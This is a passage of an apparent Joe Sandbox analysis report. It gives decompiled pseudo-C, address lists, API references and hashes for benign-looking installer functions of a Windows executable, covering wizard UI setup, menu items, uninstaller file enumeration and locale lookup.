					E0042CB64(_v68, _t1511,  &_v52, _t1940);
					E00403494( &_v24, _v52);
					_t1751 = _v24;
					E00414B00( *((intOrPtr*)( *_t1471 + 0x20c)), _t1471, _v24, _t1865, _t1895);
				}
				_t1141 =  *0x49b2f0; // 0x22679fc
				if( *((intOrPtr*)(_t1141 + 8)) <= 0) {
					L78:
					E0042B954( *((intOrPtr*)( *_t1471 + 0x27c)));
					E0044DE74( *((intOrPtr*)( *_t1471 + 0x27c)), _t1751 & 0xffffff00 | ( *0x49b29c & 0x00000020) != 0x00000000);
					_t1148 =  *0x49b2f4; // 0x2267a10
					_t1150 =  *((intOrPtr*)(_t1148 + 8)) - 1;
					if(_t1150 < 0) {
						L87:
						if(_v29 != 0 ||  *0x49b0cc == 0 ||  *0x49b37d == 0) {
							__eflags = _v28 - 0xffffffff;
							if(_v28 == 0xffffffff) {
								_t1151 =  *0x49b2f0; // 0x22679fc
								__eflags =  *(_t1151 + 8);
								if( *(_t1151 + 8) > 0) {
									_t1218 =  *0x49b2f0; // 0x22679fc
									_v36 = E0040B424(_t1218, 0);
									_t1511 = 0;
									__eflags = 0;
									E00468D98( *_t1471, 0,  *_v36, _t1900);
								}
							} else {
								_t1223 =  *0x49b2f0; // 0x22679fc
								_v36 = E0040B424(_t1223, _v28);
								_t1225 = _v36;
								__eflags =  *(_t1225 + 0x24) & 0x00000001;
								if(( *(_t1225 + 0x24) & 0x00000001) == 0) {
									_t1511 = 0;
									E00468D98( *_t1471, 0,  *_v36, _t1900);
								} else {
									_t1229 =  *0x49b2f0; // 0x22679fc
									E00468D98( *_t1471, 0,  *((intOrPtr*)(E0040B424(_t1229, 0))), _t1900);
									E00468D98( *_t1471, 1,  *_v36, _t1900);
									_t1511 =  *((intOrPtr*)( *_t1471 + 0x324));
									E00468C38( *_t1471, _t1471,  *((intOrPtr*)( *_t1471 + 0x324)),  *((intOrPtr*)( *_t1471 + 0x320)), _t1865, _t1895);
								}
							}
						} else {
							_t1240 =  *0x49b2f0; // 0x22679fc
							_t1242 =  *((intOrPtr*)(_t1240 + 8)) - 1;
							if(_t1242 < 0) {
								L102:
								E00466264( *_t1471);
								E00465FDC( *_t1471, _t1471, _t1865, _t1895, _t1980);
								if( *0x49b37d == 0) {
									__eflags = 0;
									E00414A2C( *((intOrPtr*)( *_t1471 + 0x27c)), _t1511, 0, _t1865);
								} else {
									_t1208 = E0042A028( *((intOrPtr*)( *_t1471 + 0x228)));
									_t1209 =  *0x49b2f0; // 0x22679fc
									_v36 = E0040B424(_t1209, _t1208);
									if(( *(_v36 + 0x24) & 0x00000001) != 0 || ( *0x49b29c & 0x00000010) != 0) {
										E00414A2C( *((intOrPtr*)( *_t1471 + 0x27c)), _t1511, 1, _t1865);
									} else {
										E00414A2C( *((intOrPtr*)( *_t1471 + 0x27c)), _t1511, 0, _t1865);
									}
								}
								E00414A2C( *((intOrPtr*)( *_t1471 + 0x280)), _t1511,  *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x27c)) + 0x37)), _t1865);
								if( *0x49b37d != 0) {
									 *((intOrPtr*)( *_t1471 + 0x338)) = E0042A028( *((intOrPtr*)( *_t1471 + 0x228)));
									_push(0);
									_t1511 = 0;
									E00468EF8( *_t1471, _t1471, 0,  *((intOrPtr*)( *_t1471 + 0x334)), _t1865, _t1895);
								}
								_t1164 =  *0x49b198; // 0x2278d2c
								E0047AA00(_t1164, _t1511,  &_v52);
								E00403450( *_t1471 + 0x304, _t1471, _v52, _t1865, _t1895);
								if( *0x49b0ac == 0 ||  *((char*)( *_t1471 + 0x331)) != 0) {
									_t1169 =  *_t1471;
									__eflags =  *(_t1169 + 0x308);
									if( *(_t1169 + 0x308) == 0) {
										L115:
										E00403494( &_v24,  *((intOrPtr*)( *_t1471 + 0x304)));
										goto L117;
									}
									E00403684( *((intOrPtr*)( *_t1471 + 0x308)), "(Default)");
									if(__eflags != 0) {
										E00403494( &_v24,  *((intOrPtr*)( *_t1471 + 0x308)));
										goto L117;
									}
									goto L115;
								} else {
									_t1767 =  *0x49b0ac; // 0x0
									E00403494( &_v24, _t1767);
									L117:
									E00414B00( *((intOrPtr*)( *_t1471 + 0x210)), _t1471, _v24, _t1865, _t1895);
									if(( *0x49b29a & 0x00000004) == 0) {
										__eflags = 0;
										E00414A2C( *((intOrPtr*)( *_t1471 + 0x214)), _t1511, 0, _t1865);
									} else {
										if( *0x49b0b8 != 0 ||  *((char*)( *_t1471 + 0x31c)) != 0) {
											E0042B0CC(1);
										}
										E00414A2C( *((intOrPtr*)( *_t1471 + 0x214)), _t1511, 1, _t1865);
									}
									_pop(_t1761);
									 *[fs:eax] = _t1761;
									_push(E00467E60);
									E00403400( &_v68);
									E00403400( &_v52);
									return E00403400( &_v24);
								}
							}
							_v48 = _t1242 + 1;
							_t1895 = 0;
							while(1) {
								_t1244 =  *0x49b2f0; // 0x22679fc
								_v36 = E0040B424(_t1244, _t1895);
								if(( *(_v36 + 0x24) & 0x00000001) != 0) {
									break;
								}
								_t1895 =  &(_t1895->i);
								_t510 =  &_v48;
								 *_t510 = _v48 - 1;
								__eflags =  *_t510;
								if( *_t510 != 0) {
									continue;
								}
								goto L102;
							}
							E0042A044( *((intOrPtr*)( *_t1471 + 0x228)), _t1895);
							E00468D98( *_t1471, 1,  *_v36, _t1900);
							_t1511 = 0;
							_t1784 =  *0x49b0c4; // 0x22678b8
							E00468C38( *_t1471, _t1471, 0, _t1784, _t1865, _t1895);
						}
						goto L102;
					}
					_v48 = _t1150 + 1;
					_t1896 = 0;
					do {
						_t1256 =  *0x49b2f4; // 0x2267a10
						_t1865 = E0040B424(_t1256, _t1896);
						if(( *(_t1865 + 0x35) & 0x00000008) == 0) {
							 *(_t1865 + 0x35) & 0x00000001 =  *(_t1865 + 0x35) & 0x00000010;
							E0047AA00( *((intOrPtr*)(_t1865 + 4)), _t1511,  &_v52);
							_t1511 = 0;
							__eflags = 0;
							E0044C144( *((intOrPtr*)( *_t1471 + 0x27c)), _v52, _t1865, ( *(_t1865 + 0x20) & 0xffffff00 | 0 != 0x00000000) ^ 0x00000001,  *(_t1865 + 0x20), ( *(_t1865 + 0x1c) & 0xffffff00 | 0 != 0x00000000) ^ 0x00000001, 0,  *(_t1865 + 0x1c));
						} else {
							E0047AA00( *((intOrPtr*)(_t1865 + 4)), _t1511,  &_v52);
							_t1511 = 0;
							E0044C214(0, _v52, _t1865, ( *(_t1865 + 0x1c) & 0xffffff00 | ( *(_t1865 + 0x35) & 0x00000001) != 0x00000000) ^ 0x00000001, 0,  *(_t1865 + 0x1c));
						}
						if( *((intOrPtr*)(_t1865 + 0x3a)) != 0 ||  *((intOrPtr*)(_t1865 + 0x36)) >= 0x100000) {
							 *((char*)( *_t1471 + 0x33c)) = 1;
						}
						_t1896 = _t1896 + 1;
						_t498 =  &_v48;
						 *_t498 = _v48 - 1;
					} while ( *_t498 != 0);
					goto L87;
				} else {
					E00429FC0( *((intOrPtr*)( *_t1471 + 0x228)));
					_t1281 =  *0x49b2f0; // 0x22679fc
					_t1283 =  *((intOrPtr*)(_t1281 + 8)) - 1;
					if(_t1283 < 0) {
						L68:
						if(_v28 != 0xffffffff ||  *((intOrPtr*)( *_t1471 + 0x30c)) == 0) {
							L75:
							if(_v28 == 0xffffffff) {
								_t1751 = 0;
								__eflags = 0;
								E0042A044( *((intOrPtr*)( *_t1471 + 0x228)), 0);
							} else {
								_t1751 = _v28;
								E0042A044( *((intOrPtr*)( *_t1471 + 0x228)), _v28);
							}
							goto L78;
						} else {
							_t1291 =  *0x49b2f0; // 0x22679fc
							_t1293 =  *((intOrPtr*)(_t1291 + 8)) - 1;
							if(_t1293 < 0) {
								goto L75;
							}
							_v48 = _t1293 + 1;
							_t1895 = 0;
							while(1) {
								_t1295 =  *0x49b2f0; // 0x22679fc
								_v36 = E0040B424(_t1295, _t1895);
								if(E00406AA4( *_v36,  *((intOrPtr*)( *_t1471 + 0x30c))) == 0) {
									break;
								}
								_t1895 =  &(_t1895->i);
								_t452 =  &_v48;
								 *_t452 = _v48 - 1;
								__eflags =  *_t452;
								if( *_t452 != 0) {
									continue;
								}
								goto L75;
							}
							_v28 = _t1895;
							goto L75;
						}
					}
					_v48 = _t1283 + 1;
					_t1897 = 0;
					do {
						_t1302 =  *0x49b2f0; // 0x22679fc
						_v36 = E0040B424(_t1302, _t1897);
						E0047AA00( *((intOrPtr*)(_v36 + 4)), _t1511,  &_v52);
						_t1511 = _v36;
						_t1865 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x228)) + 0xfc))));
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t1471 + 0x228)) + 0xfc)))) + 0x30))();
						if(_v28 == 0xffffffff &&  *0x49b0c0 != 0) {
							_t1795 =  *0x49b0c0; // 0x0
							if(E00406AA4( *_v36, _t1795) == 0) {
								_v28 = _t1897;
								if(( *(_v36 + 0x24) & 0x00000001) == 0) {
									_v29 = 1;
								}
							}
						}
						_t1897 =  &(_t1897->i);
						_t442 =  &_v48;
						 *_t442 = _v48 - 1;
					} while ( *_t442 != 0);
					goto L68;
				}
			}

0x00466728
0x00466728
0x00466728
0x00466728
0x00466729
0x0046672b
0x0046672e
0x0046672f
0x00466730
0x00466733
0x00466736
0x00466739
0x0046673e
0x00466740
0x00466743
0x00466743
0x00466748
0x0046674b
0x0046674e
0x00466751
0x0046675f
0x00466769
0x0046677c
0x00466790
0x004667a4
0x004667b8
0x004667cc
0x004667e0
0x004667e6
0x004667fb
0x004667ff
0x00466803
0x00466816
0x00466823
0x00466826
0x00466828
0x0046682a
0x0046682a
0x00466837
0x00466837
0x0046683c
0x00466851
0x00466855
0x00466862
0x0046686c
0x00466879
0x0046687c
0x0046687e
0x00466880
0x00466880
0x00466883
0x0046688d
0x0046688d
0x00466894
0x00466899
0x004668a0
0x004668b5
0x004668a2
0x004668a4
0x004668ac
0x004668ac
0x004668c9
0x004668cf
0x004668d5
0x004668e5
0x004668eb
0x004668fb
0x00466901
0x0046690d
0x0046691e
0x00466921
0x00466929
0x00466933
0x0046690f
0x0046690f
0x00466917
0x00466917
0x0046693f
0x00466948
0x00466952
0x0046695d
0x00466965
0x0046696e
0x00466978
0x00466982
0x00466982
0x00466987
0x0046698b
0x0046698f
0x00466993
0x00466997
0x004669aa
0x004669b8
0x004669c5
0x004669d4
0x004669e3
0x004669ea
0x00466a00
0x00466a14
0x00466a19
0x00466a25
0x00466a32
0x00466a38
0x00466a4b
0x00466a5a
0x00466a71
0x00466a7e
0x00466a84
0x00466a97
0x00466aa6
0x00466abd
0x00466aca
0x00466ad0
0x00466ad5
0x00466ae7
0x00466af1
0x00466b0c
0x00466b1e
0x00466b30
0x00466b36
0x00466b51
0x00466b5b
0x00466b68
0x00466b78
0x00466b87
0x00466ba7
0x00466bb1
0x00466bbe
0x00466bc6
0x00466bcc
0x00466bdc
0x00466bea
0x00466bf0
0x00466c05
0x00466c0f
0x00466c1f
0x00466c41
0x00466c4e
0x00466c54
0x00466c61
0x00466c67
0x00466c75
0x00466c7b
0x00466c90
0x00466c9d
0x00466ca3
0x00466cb0
0x00466cb6
0x00466cd9
0x00466cfc
0x00466d0a
0x00466d10
0x00466d25
0x00466d32
0x00466d38
0x00466d5a
0x00466d68
0x00466d6e
0x00466d76
0x00466d83
0x00466d90
0x00466d96
0x00466daa
0x00466db9
0x00466dcb
0x00466dd8
0x00466dde
0x00466df2
0x00466e01
0x00466e06
0x00466e0d
0x00466e73
0x00466e80
0x00466e82
0x00466e0f
0x00466e24
0x00466e31
0x00466e37
0x00466e62
0x00466e62
0x00466e90
0x00466e9b
0x00466eb3
0x00466ebd
0x00466ecd
0x00466ed9
0x00466ee2
0x00466eee
0x00466ef2
0x00466f0e
0x00466f10
0x00466f1d
0x00466f38
0x00466f51
0x00466f53
0x00466f55
0x00466f57
0x00466f57
0x00466f62
0x00466f6d
0x00466f6d
0x00466f77
0x00466f87
0x00466fa9
0x00466fb1
0x00466fc6
0x00466fee
0x00467019
0x00467026
0x0046702c
0x00467031
0x0046703c
0x00467041
0x00467074
0x004670a3
0x004670ad
0x004670bd
0x004670da
0x004670e8
0x004670f3
0x0046710b
0x00467115
0x00467125
0x00467139
0x00467150
0x0046715d
0x00467161
0x0046716b
0x0046717b
0x0046718a
0x00467196
0x00467198
0x004671a1
0x004671ad
0x004671c5
0x004671d2
0x004671d2
0x004671a1
0x004671e0
0x004671eb
0x00467203
0x0046720d
0x0046721d
0x00467229
0x00467246
0x0046724a
0x00467266
0x00467268
0x00467275
0x00467290
0x004672a9
0x004672ab
0x004672ad
0x004672af
0x004672af
0x004672ba
0x004672c5
0x004672c5
0x004672cf
0x004672df
0x00467309
0x00467311
0x0046732e
0x00467356
0x00467381
0x0046738e
0x00467394
0x00467399
0x004673a4
0x004673a9
0x004673dc
0x0046740b
0x00467418
0x0046741e
0x0046742c
0x00467437
0x0046744f
0x00467459
0x00467469
0x0046748b
0x0046749a
0x004674b3
0x004674b9
0x004674cb
0x004674d9
0x004674e4
0x004674fc
0x0046750a
0x00467515
0x0046752d
0x0046753a
0x00467540
0x0046754d
0x00467553
0x00467561
0x0046756c
0x00467584
0x00467592
0x00467598
0x004675ad
0x004675ba
0x004675c0
0x004675e2
0x004675fc
0x00467610
0x00467616
0x0046761c
0x0046762c
0x00467632
0x0046763c
0x00467644
0x0046764a
0x0046764b
0x0046765b
0x0046766a
0x0046768d
0x0046769a
0x004676a0
0x004676ad
0x004676b3
0x004676cc
0x004676da
0x004676e2
0x004676e8
0x004676f5
0x00467705
0x00467711
0x0046771d
0x00467730
0x00467730
0x0046773c
0x00467748
0x0046775b
0x0046775b
0x00467767
0x00467773
0x00467786
0x00467786
0x0046779a
0x004677a6
0x004677ab
0x004677be
0x004677c5
0x004677d1
0x004677eb
0x004677e7
0x004677e7
0x004677e7
0x004677ef
0x004677fc
0x00467816
0x00467812
0x00467812
0x00467812
0x0046781a
0x00467820
0x00467827
0x00467832
0x00467841
0x004678ac
0x004678c1
0x004678d6
0x00467843
0x00467846
0x0046784b
0x0046785b
0x00467863
0x00467868
0x00467878
0x00467880
0x00467885
0x00467895
0x00467895
0x00467841
0x004678e2
0x0046797e
0x00467984
0x004678e8
0x004678eb
0x004678f0
0x004678ff
0x00467904
0x0046790b
0x00467928
0x0046792d
0x00467931
0x0046793e
0x0046793e
0x0046790d
0x00467910
0x00467916
0x00467916
0x00467949
0x00467954
0x0046795f
0x0046796c
0x0046796f
0x0046796f
0x00467989
0x00467992
0x00467aa2
0x00467aaa
0x00467ac1
0x00467ac6
0x00467ace
0x00467ad1
0x00467b7f
0x00467b83
0x00467c02
0x00467c06
0x00467c6f
0x00467c74
0x00467c78
0x00467c7c
0x00467c86
0x00467c8e
0x00467c8e
0x00467c92
0x00467c92
0x00467c08
0x00467c0b
0x00467c15
0x00467c18
0x00467c1b
0x00467c1f
0x00467c64
0x00467c68
0x00467c21
0x00467c23
0x00467c33
0x00467c41
0x00467c48
0x00467c58
0x00467c58
0x00467c1f
0x00467b97
0x00467b97
0x00467b9f
0x00467ba2
0x00467c97
0x00467c99
0x00467ca0
0x00467cac
0x00467d06
0x00467d08
0x00467cae
0x00467cb6
0x00467cbd
0x00467cc7
0x00467cd1
0x00467ce6
0x00467ced
0x00467cf7
0x00467cf7
0x00467cd1
0x00467d20
0x00467d2c
0x00467d3d
0x00467d43
0x00467d4d
0x00467d51
0x00467d51
0x00467d59
0x00467d5e
0x00467d6d
0x00467d79
0x00467d96
0x00467d98
0x00467d9f
0x00467db5
0x00467dc0
0x00000000
0x00467dc0
0x00467dae
0x00467db3
0x00467dd2
0x00000000
0x00467dd2
0x00000000
0x00467d86
0x00467d89
0x00467d8f
0x00467dd7
0x00467de2
0x00467dee
0x00467e2c
0x00467e2e
0x00467df0
0x00467df7
0x00467e0e
0x00467e0e
0x00467e1d
0x00467e1d
0x00467e35
0x00467e38
0x00467e3b
0x00467e43
0x00467e4b
0x00467e58
0x00467e58
0x00467d79
0x00467ba9
0x00467bac
0x00467bae
0x00467bb0
0x00467bba
0x00467bc4
0x00000000
0x00000000
0x00467bf7
0x00467bf8
0x00467bf8
0x00467bf8
0x00467bfb
0x00000000
0x00000000
0x00000000
0x00467bfd
0x00467bd0
0x00467bde
0x00467be3
0x00467be5
0x00467bed
0x00467bed
0x00000000
0x00467b83
0x00467ad8
0x00467adb
0x00467add
0x00467adf
0x00467ae9
0x00467aef
0x00467b35
0x00467b46
0x00467b56
0x00467b56
0x00467b58
0x00467af1
0x00467b08
0x00467b18
0x00467b1a
0x00467b1a
0x00467b61
0x00467b6e
0x00467b6e
0x00467b75
0x00467b76
0x00467b76
0x00467b76
0x00000000
0x00467998
0x004679a0
0x004679a5
0x004679ad
0x004679b0
0x00467a27
0x00467a2b
0x00467a7b
0x00467a7f
0x00467a9b
0x00467a9b
0x00467a9d
0x00467a81
0x00467a89
0x00467a8c
0x00467a8c
0x00000000
0x00467a38
0x00467a38
0x00467a40
0x00467a43
0x00000000
0x00000000
0x00467a46
0x00467a49
0x00467a4b
0x00467a4d
0x00467a57
0x00467a6e
0x00000000
0x00000000
0x00467a75
0x00467a76
0x00467a76
0x00467a76
0x00467a79
0x00000000
0x00000000
0x00000000
0x00467a79
0x00467a70
0x00000000
0x00467a70
0x00467a2b
0x004679b3
0x004679b6
0x004679b8
0x004679ba
0x004679c4
0x004679d0
0x004679e6
0x004679e9
0x004679eb
0x004679f2
0x00467a02
0x00467a0f
0x00467a11
0x00467a1b
0x00467a1d
0x00467a1d
0x00467a1b
0x00467a0f
0x00467a21
0x00467a22
0x00467a22
0x00467a22
0x00000000
0x004679b8

APIs

Part of subcall function 00493B60: GetWindowRect.USER32 ref: 00493B76

LoadBitmapA.USER32 ref: 00466AF7

Part of subcall function 0041D698: GetObjectA.GDI32(?,00000018,?), ref: 0041D6C3

Part of subcall function 00466504: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004665A7
Part of subcall function 00466504: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004665CD
Part of subcall function 00466504: ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 00466624

Part of subcall function 00465EC0: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466BAC,00000000,00000000,00000000,00400000,STOPIMAGE,0000000C,00000000), ref: 00465ED8

Part of subcall function 00493DE4: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 00493DEE

Part of subcall function 00493AB0: 740BAC50.USER32(00000000,?,?,?), ref: 00493AD2
Part of subcall function 00493AB0: SelectObject.GDI32(?,00000000), ref: 00493AF8
Part of subcall function 00493AB0: 740BB380.USER32(00000000,?,00493B56,00493B4F,?,00000000,?,?,?), ref: 00493B49

Part of subcall function 00493DD4: MulDiv.KERNEL32(0000004B,?,00000006), ref: 00493DDE

GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,0227D994,0227F5E8,?,?,0227F618,?,?,0227F668,?), ref: 00467795
AppendMenuA.USER32 ref: 004677A6
AppendMenuA.USER32 ref: 004677BE

Part of subcall function 0042A044: SendMessageA.USER32 ref: 0042A05A

Strings

(Default), xrefs: 00467DA9
, xrefs: 00466BB9
STOPIMAGE, xrefs: 00466AEC

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Menu$AppendExtractIconObject$B380BitmapCallbackDispatcherFileInfoLoadMessageRectSelectSendSystemUserWindow
String ID: $(Default)$STOPIMAGE
API String ID: 394891289-770201673
Opcode ID: 2fd9d9d6ea17357b7956dea6dd017955e4d4be405f50d5e60f55d1bf3d32f2f8
Instruction ID: 4560e714cf4c2fa6a19d0b525ac7dbb589a680ec0160af26a7e9c07dde457078
Opcode Fuzzy Hash: 2fd9d9d6ea17357b7956dea6dd017955e4d4be405f50d5e60f55d1bf3d32f2f8
Instruction Fuzzy Hash: 42F2D5786015148FCB00EB69D5D9F9A73F1FF49308F1542B6E5049B36AD738AC4ACB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00473B80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99
fileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00473B80(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _WIN32_FIND_DATAA _v328;
				char _v332;
				void* _t42;
				void* _t59;
				void* _t62;
				void* _t65;
				void* _t76;
				intOrPtr _t85;
				void* _t98;

				_v332 = 0;
				_v8 = 0;
				_push(_t98);
				_push(0x473cea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t98 + 0xfffffeb8;
				E0042C3E4( *((intOrPtr*)(_a4 - 4)),  &_v332);
				E0040357C( &_v332, "unins???.*");
				_t42 = FindFirstFileA(E00403738(_v332),  &_v328); // executed
				_t76 = _t42;
				if(_t76 == 0xffffffff) {
					L10:
					_pop(_t85);
					 *[fs:eax] = _t85;
					_push(0x473cf1);
					E00403400( &_v332);
					return E00403400( &_v8);
				} else {
					goto L1;
				}
				L8:
				if(FindNextFileA(_t76,  &_v328) != 0) {
					L1:
					E0040355C( &_v8, 0x104,  &(_v328.cFileName));
					if(E00403574(_v8) >= 9) {
						E00403778(_v8, 5, 1,  &_v332);
						_t59 = E00406AA4(_v332, 0x473d14);
						_t102 = _t59;
						if(_t59 == 0) {
							_t62 = E0042E8E8( *((intOrPtr*)(_v8 + 5)), _t102);
							_t103 = _t62;
							if(_t62 != 0) {
								_t65 = E0042E8E8( *((intOrPtr*)(_v8 + 6)), _t103);
								_t104 = _t65;
								if(_t65 != 0 && E0042E8E8( *((intOrPtr*)(_v8 + 7)), _t104) != 0 &&  *((char*)(_v8 + 8)) == 0x2e) {
									E00403778(_v8, 3, 6,  &_v332);
									 *((char*)(_a4 + E00406D78(_v332, 3) - 0x3ec)) = 1;
								}
							}
						}
					}
					goto L8;
				} else {
					FindClose(_t76);
					goto L10;
				}
			}

0x00473b8e
0x00473b94
0x00473b99
0x00473b9a
0x00473b9f
0x00473ba2
0x00473bb8
0x00473bc8
0x00473bd9
0x00473bde
0x00473be3
0x00473cc9
0x00473ccb
0x00473cce
0x00473cd1
0x00473cdc
0x00473ce9
0x00000000
0x00000000
0x00000000
0x00473cae
0x00473cbd
0x00473be9
0x00473bf7
0x00473c07
0x00473c21
0x00473c31
0x00473c36
0x00473c38
0x00473c45
0x00473c4a
0x00473c4c
0x00473c59
0x00473c5e
0x00473c60
0x00473c93
0x00473ca6
0x00473ca6
0x00473c60
0x00473c4c
0x00473c38
0x00000000
0x00473cc3
0x00473cc4
0x00000000
0x00473cc4

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00473CEA,?,?,0049B16C,00000000), ref: 00473BD9
FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,00473CEA,?,?,0049B16C,00000000), ref: 00473CB6
FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,00473CEA,?,?,0049B16C,00000000), ref: 00473CC4

Strings

unins, xrefs: 00473C2C
unins???.*, xrefs: 00473BC3

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID: unins$unins???.*
API String ID: 3541575487-1009660736
Opcode ID: ad289a94d19bc69e9e99f1ce8dbb0e3a7eb22f469afc19a0e4e8a139a0e79a8b
Instruction ID: cbacc5ba4142c5cf1ff9b290486cf2f1d2b25b3d7f8411f1116340df876b7a01
Opcode Fuzzy Hash: ad289a94d19bc69e9e99f1ce8dbb0e3a7eb22f469afc19a0e4e8a139a0e79a8b
Instruction Fuzzy Hash: D93152716001089FCB21EF66C881ADEB7B8DF44305F5480B6B848AB3A2DB38DF459B58

Uniqueness

Uniqueness Score: -1.00%

Function 00451DC0 Relevance: 3.0, APIs: 2, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00451DC0(void* __eax, struct _WIN32_FIND_DATAA* __ecx, void* __edx, void* __eflags) {
				void* _v8;
				char _v16;
				long _v20;
				void* _t13;
				intOrPtr _t27;
				void* _t35;
				void* _t37;
				intOrPtr _t38;

				_t35 = _t37;
				_t38 = _t37 + 0xfffffff0;
				if(E00451A84(__eax,  &_v16) != 0) {
					_push(_t35);
					_push(0x451e23);
					_push( *[fs:eax]);
					 *[fs:eax] = _t38;
					_t13 = FindFirstFileA(E00403738(__edx), __ecx); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E00451E2A);
					return E00451AC0( &_v16);
				} else {
					_v8 = 0xffffffff;
					return _v8;
				}
			}

0x00451dc1
0x00451dc3
0x00451ddb
0x00451de8
0x00451de9
0x00451dee
0x00451df1
0x00451dfd
0x00451e02
0x00451e0a
0x00451e0f
0x00451e12
0x00451e15
0x00451e22
0x00451ddd
0x00451ddd
0x00451e3c
0x00451e3c

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00451E23,?,?,-00000001,00000000), ref: 00451DFD
GetLastError.KERNEL32(00000000,?,00000000,00451E23,?,?,-00000001,00000000), ref: 00451E05

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: a6c7456738630cd73771075d39f8c2391f7562d7aa9429d5def774ea4d0ab84f
Instruction ID: 23c732d90e8bf7fb5554148fdd74b7d8c495ca1fa808cb6329eaea7bb9c4b149
Opcode Fuzzy Hash: a6c7456738630cd73771075d39f8c2391f7562d7aa9429d5def774ea4d0ab84f
Instruction Fuzzy Hash: 6FF07D31A04204ABCB10DF7AAC0299EF7FCDB8573572046BBFC14D3292EA384E048458

Uniqueness

Uniqueness Score: -1.00%

Function 00408548 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408548(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100); // executed
				_t19 = _t5;
				if(_t5 <= 0) {
					return E00403494(_t10, _t18);
				}
				return E004034E0(_t10, _t5 - 1,  &_v260, _t19);
			}

0x00408553
0x00408555
0x00408566
0x0040856b
0x0040856d
0x00000000
0x00408585
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,00408613,?,00000000,004086F2), ref: 00408566

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 1b80cc3fd0b7e72cb7fb5671384292bf6d2c40730a334b313e24bd91b7bc9a38
Instruction ID: 1314cde9ae44d735cc76a3c4c713e691c40fd14dc10f296433f9f6820e98487d
Opcode Fuzzy Hash: 1b80cc3fd0b7e72cb7fb5671384292bf6d2c40730a334b313e24bd91b7bc9a38
Instruction Fuzzy Hash: E4E02271700218A2C311A91A8C869F6B34C9718310F00427FBD08EB3C2EDB89E4046E9

Uniqueness

Uniqueness Score: -1.00%

